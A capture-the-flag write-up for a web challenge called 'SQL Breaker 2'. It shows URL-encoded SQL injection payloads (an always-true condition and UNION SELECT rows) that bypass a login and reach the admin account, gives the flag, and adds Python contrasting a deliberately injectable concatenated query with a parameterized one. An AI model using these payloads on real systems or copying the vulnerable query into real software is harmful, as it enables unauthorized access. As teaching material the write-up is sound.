SQL Breaker 2 [Web]

(no description)

Recon

https://challenges.neverlanctf.com:1165/login.php?username=x%27%20or%20(1=1)--%20.&password=a

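The username decodes to x' or (1=1)-- . which makes the WHERE clause always true and comments out the password check. This logs us in, but the page then tells us: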

Welcome, John
Profile changes are not available at this time.
Sorry, but only `admin` users can view the flag

Next we try a UNION SELECT that supplies its own row of five constants:

https://challenges.neverlanctf.com:1165/login.php?username=%27UNION%20SELECT%201,2,3,4,5--%20.&password=a

We are logged in as John.

But when we change the constants from 1,2,3,4,5 to 2,3,4,5,6:

https://challenges.neverlanctf.com:1165/login.php?username=%27UNION%20SELECT%202,3,4,5,6--%20.&password=a

We are logged in as the admin.

Welcome, Bobbyadmin
Profile changes are not available at this time.
but, here's your flag{esc4p3y0ur1nputs}
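
The flag's hint (escape your inputs) as an added example, not code from the challenge: a string-concatenated login query next to a parameterized one, run against the three username values above. The SQLite backend, the table and column names, the sample rows, and the idea that the application takes the account id from the first returned column are all assumptions made for illustration.

```python
import sqlite3

def make_db():
    # Constructed sample data. The five-column layout is an assumption taken
    # from the five-value UNION SELECT; column names are hypothetical.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
               "password TEXT, name TEXT, role TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", [
        (1, "john", "constructed-pw-1", "John", "user"),
        (2, "bobby", "constructed-pw-2", "Bobby", "admin"),
    ])
    return db

def login_concatenated(db, username, password):
    # Vulnerable pattern: input becomes part of the SQL text, so a quote in
    # `username` ends the string literal and the rest is parsed as SQL.
    sql = ("SELECT * FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None  # assumed: first column is the account id

def login_parameterized(db, username, password):
    # Hardened pattern: values are bound as data and never parsed as SQL.
    row = db.execute("SELECT id FROM users WHERE username = ? AND password = ?",
                     (username, password)).fetchone()
    return row[0] if row else None

def profile(db, user_id):
    # Display name and role for the id the login step returned.
    return db.execute("SELECT name, role FROM users WHERE id = ?",
                      (user_id,)).fetchone()

def compare(username, password="a"):
    # Run one username through both login variants on a fresh database.
    db = make_db()
    results = {}
    for label, login in (("concatenated", login_concatenated),
                         ("parameterized", login_parameterized)):
        uid = login(db, username, password)
        results[label] = profile(db, uid) if uid is not None else None
    return results

# The three username values from the write-up, URL-decoded.
PAYLOADS = ["x' or (1=1)-- .", "'UNION SELECT 1,2,3,4,5-- .",
            "'UNION SELECT 2,3,4,5,6-- ."]

if __name__ == "__main__":
    for p in PAYLOADS:
        print(repr(p), compare(p))
```

Plaintext passwords appear only to keep the sample short; a real login would compare against a salted password hash.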

Flag

flag{esc4p3y0ur1nputs}